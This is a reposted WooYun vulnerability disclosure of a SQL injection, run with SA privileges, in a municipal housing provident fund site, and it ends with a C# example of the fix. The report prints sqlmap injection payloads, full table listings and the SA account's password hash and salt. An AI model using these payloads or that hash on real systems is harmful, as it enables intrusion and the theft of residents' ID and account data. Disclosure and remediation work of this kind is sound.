SQL injection (SA privileges) at a municipal Housing Provident Fund Management Center exposing 700W+ (7 million+) account records plus 58W+ (580,000+) provident fund records (names, balances, ID card numbers, employers, etc.)

admin, 2017-04-14 20:02:57 · Comments · 360 views · 273 characters · 0 min 54 s read
Summary

2016-04-01: Details reported to the vendor; awaiting vendor handling
2016-04-05: Vendor confirmed; details disclosed to the vendor only
2016-04-15: Details disclosed to core white hats and domain experts
2016-04-25: Details disclosed to regular white hats
2016-05-05: Details disclosed to intern white hats
2016-05-20: Details disclosed to the public

Vulnerability Overview (followers: 15)

Defect ID: WooYun-2016-191218

Title: SQL injection (SA privileges) at a municipal Housing Provident Fund Management Center exposing 700W+ (7 million+) account records plus 58W+ (580,000+) provident fund records (names, balances, ID card numbers, employers, etc.)

Vendor: a municipal Housing Provident Fund Management Center

Author: 路人甲

Submitted: 2016-04-01 00:00

Published: 2016-05-20 18:40

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: www.wooyun.org (contact them if you have questions or need help)

Tags: injection techniques


Vulnerability Details

Brief description:

See title.

Detailed description:

SQL injection (SA privileges) at a municipal Housing Provident Fund Management Center, leaking 700W+ (7 million+) account records plus 58W+ (580,000+) provident fund records (names, balances, ID card numbers, employers, etc.).

Injection point: http://**.**.**.**/List/DownLoadCenterDetails?id=5EBC88CC-A248-41FD-9703-7FD6CC454628 . Running it through sqlmap showed the query executes with SA privileges, so large amounts of sensitive data can be dumped directly: provident fund balances, resident ID card numbers, names, employer names and more.

+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| dbo.Fq_PersonAccountDetails             | 7130445 |
| dbo.Fq_LoanDetails                      |  889789 |
| dbo.Fq_FundAccountsInfo                 |  580320 |
| dbo.Im_PFAccountContrast                |  575657 |

Code:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' AND 9621=9621 AND 'EhJf'='EhJf

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' WAITFOR DELAY '0:0:5'--
---
[07:57:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] GIOT_QZgjj
[*] master
[*] model
[*] msdb
[*] tempdb


current database: 'GIOT_QZgjj'

current user: 'sa'

database management system users password hashes:
[*] sa [1]:
password hash: 0x01004086ceb659f0af51ae621f0e86391ef163ba496c273d29ec
header: 0x0100
salt: 4086ceb6
mixedcase: 59f0af51ae621f0e86391ef163ba496c273d29ec

[09:10:38] [INFO] testing if current user is DBA
database management system users privileges:
[*] sa (administrator)


Database: GIOT_QZgjj
[88 tables]
+-------------------------------------+
| Bi_Company |
| Bi_CompanySort |
| Bi_Department |
| Bi_DicType |
| Bi_DicValue |
| Bi_EmployeeInfo |
| Bi_NotWorkDay |
| Bi_Position |
| Cp_OverviewManagement |
| Cp_ProvidentFundCard |
| Cs_LendingRates |
| Cs_LendingYearRates |
| Fq_AccountsSMS |
| Fq_CompanyAccountsInfo |
| Fq_CompanyAcountsInfoPro |
| Fq_FundAccountsInfo |
| Fq_FundAccountsInfoPro |
| Fq_LoanAccount |
| Fq_LoanAccountContrast_V |
| Fq_LoanAccountPro |
| Fq_LoanAccountProNew_V |
| Fq_LoanAccountProNo_V |
| Fq_LoanBank |
| Fq_LoanDetailSMS |
| Fq_LoanDetails |
| Fq_LoanDetailsPro |
| Fq_LoanHandleProgress |
| Fq_LoanHandleProgressPro |
| Fq_ManagementDept |
| Fq_PFPersonAccountProNo_V |
| Fq_PersonAccountDetails |
| Fq_PersonAccountDetailsPro |
| Fq_PersonAccountNew_V |
| Fq_WhichLinks |
| Ic_ComplaintsRights |
| Ic_ConsultingInteractive |
| Ic_ReplyQuestion |
| Im_AnnouncementPublicity |
| Im_CanGoodsProperty |
| Im_CategoryManagement |
| Im_CustomerInfo |
| Im_DownloadCenter |
| Im_Floatage |
| Im_FundCreditBlacklist |
| Im_GovernmentInformationDisclosure |
| Im_LawGuide |
| Im_Links |
| Im_PFAccountContrast |
| Im_PaymentHandlingProgressPublicity |
| Im_PoliciesRegulations |
| Im_RotationDiagram |
| Im_SearchKeywords |
| Im_SpecialTopic |
| Im_VerificationManage |
| Im_WorkDynamics |
| Pf_AccountContrast_V |
| Rs_HomeServiceReservationManage |
| Rs_ReservationManage |
| Rs_ReservationManageDepartment |
| Rs_ReservationNumberLimit |
| Rs_SMSTemplates |
| Sa_ControlInfo |
| Sa_LoginControl |
| Sa_ParameterConfiguration |
| Sa_Privilege_Company_Handle |
| Sa_UpdateLog |
| Sa_UserInfo |
| Sh_ComCustomerInfo |
| Sh_Persom |
| Sh_PersonChangePayListDetail |
| Sh_PersonFundChangeDetail |
| Sh_Settings |
| bo.Sh_PersonFundChange |
| sa_LogError |
| sa_LogHandle |
| sa_LogHandle_Report |
| sa_LogLoa |
| sa_LogLogin_Report |
| sa_Menu_Handle_Tree_View |
| sa_OnLiner |
| sa_Role_User |
| sa_Role_User_v |
| sa_handle_Guid |
| sa_menu_Guid |
| sa_privilege_Handle |
| sa_privilege_Handle_v |
| sa_role |
| sa_user_menu |
+-------------------------------------+


Proof of vulnerability:

The data dumped is as follows:

Code:
Database: GIOT_QZgjj
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| dbo.Fq_PersonAccountDetails | 7130445 |
| dbo.Fq_LoanDetails | 889789 |
| dbo.Fq_FundAccountsInfo | 580320 |
| dbo.Im_PFAccountContrast | 575657 |
| dbo.Im_VerificationManage | 273258 |
| dbo.Fq_AccountsSMS | 209707 |
| dbo.Pf_AccountContrast_V | 120413 |
| dbo.Fq_LoanHandleProgress | 97543 |
| dbo.Im_CustomerInfo | 63783 |
| dbo.Fq_LoanAccount | 60268 |
| dbo.Fq_LoanDetailSMS | 55956 |
| dbo.Fq_LoanAccountContrast_V | 22150 |
| dbo.Fq_LoanDetailsPro | 4200 |
| dbo.Ic_ConsultingInteractive | 1714 |
| dbo.Sa_LoginControl | 1160 |
| dbo.sa_OnLiner | 475 |
| dbo.sa_privilege_Handle | 438 |
| dbo.sa_privilege_Handle_v | 438 |
| dbo.Ic_ReplyQuestion | 330 |
| dbo.Im_SpecialTopic | 321 |
| dbo.sa_Menu_Handle_Tree_View | 287 |
| dbo.Im_WorkDynamics | 285 |
| dbo.sa_LogError | 252 |
| dbo.sa_handle_Guid | 202 |
| dbo.sa_LogHandle | 116 |
| dbo.Im_AnnouncementPublicity | 114 |
| dbo.Im_CanGoodsProperty | 105 |
| dbo.sa_menu_Guid | 85 |
| dbo.Ic_ComplaintsRights | 84 |
| dbo.Im_PoliciesRegulations | 74 |
| dbo.Im_CategoryManagement | 65 |
| dbo.Sh_Settings | 52 |
| dbo.Rs_ReservationManage | 50 |
| dbo.Im_LawGuide | 45 |
| dbo.Fq_LoanBank | 34 |
| dbo.Im_DownloadCenter | 25 |
| dbo.Im_GovernmentInformationDisclosure | 19 |
| dbo.Cp_ProvidentFundCard | 14 |
| dbo.Fq_ManagementDept | 13 |
| dbo.Im_PaymentHandlingProgressPublicity | 13 |
| dbo.sa_LogLogin_Report | 12 |
| dbo.Sa_UserInfo | 12 |
| dbo.Rs_HomeServiceReservationManage | 11 |
| dbo.Rs_ReservationManageDepartment | 11 |
| dbo.Bi_EmployeeInfo | 10 |
| dbo.Im_RotationDiagram | 10 |
| dbo.Rs_ReservationNumberLimit | 10 |
| dbo.sa_Role_User | 10 |
| dbo.sa_Role_User_v | 10 |
| dbo.Im_Links | 9 |
| dbo.Fq_WhichLinks | 8 |
| dbo.Rs_SMSTemplates | 7 |
| dbo.Sa_ControlInfo | 7 |
| dbo.Sa_Privilege_Company_Handle | 7 |
| dbo.Sa_ParameterConfiguration | 6 |
| dbo.Im_SearchKeywords | 4 |
| dbo.sa_LogHandle_Report | 4 |
| dbo.Bi_Company | 3 |
| dbo.Bi_Department | 3 |
| dbo.Bi_DicType | 3 |
| dbo.Bi_DicValue | 3 |
| dbo.Cp_OverviewManagement | 3 |
| dbo.Bi_CompanySort | 2 |
| dbo.Cs_LendingYearRates | 2 |
| dbo.sa_role | 2 |
| dbo.Sh_ComCustomerInfo | 2 |
| dbo.Sh_PersonChangePayListDetail | 2 |
| dbo.Bi_NotWorkDay | 1 |
| dbo.Cs_LendingRates | 1 |
| dbo.Im_Floatage | 1 |
+-----------------------------------------+---------+


Fix:

Filter the input.
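As an added example (not the affected site's code) of what "filter the input" amounts to for the injection point in the Detailed description, here is the pattern that produces that injection beside its hardened form, in C# since the report identifies ASP.NET 4.0 on SQL Server. The table name dbo.Im_DownloadCenter comes from the report's table list; the Id column, the method names and the connection-string handling are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not the affected site's code. Assumes dbo.Im_DownloadCenter
// (named in the report's table list) is keyed by a uniqueidentifier column
// called Id; the column name is an assumption.
public static class DownloadCenterDetails
{
    // Vulnerable pattern consistent with what sqlmap reported: the raw
    // query-string value is spliced into the SQL text, so a value carrying a
    // quote changes the statement. Boolean-blind, stacked WAITFOR and
    // time-based injection all follow from this single concatenation.
    public static DataTable LoadUnsafe(string connStr, string id)
    {
        string sql = "SELECT * FROM dbo.Im_DownloadCenter WHERE Id = '" + id + "'";
        using (var conn = new SqlConnection(connStr))
        using (var adapter = new SqlDataAdapter(sql, conn))
        {
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    // Hardened form with two independent defences: the value must parse as a
    // GUID in 8-4-4-4-12 form before it goes near SQL (a GUID cannot contain a
    // quote, a semicolon or WAITFOR), and it is bound as a typed parameter, so
    // it can never become SQL text. Returns null for a rejected id so the
    // caller can answer 400 instead of 500.
    public static DataTable LoadSafe(string connStr, string id)
    {
        Guid key;
        if (!Guid.TryParseExact(id, "D", out key))
            return null;

        const string sql = "SELECT * FROM dbo.Im_DownloadCenter WHERE Id = @id";
        using (var conn = new SqlConnection(connStr)) // connStr: low-privilege login, not sa
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.UniqueIdentifier).Value = key;
            conn.Open();
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader())
                table.Load(reader);
            return table;
        }
    }
}
```

Whatever the query looks like, the application's login should not be sa: with a read-only login scoped to the public download tables, an injection would still not reach the login hashes or the Fq_* account data listed in the report.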

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vendor Response

Vendor response:

Severity: High

Rank: 10

Confirmed: 2016-04-05 18:31

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Fujian branch, which will coordinate handling with the website's operating unit.

Latest status:

None yet

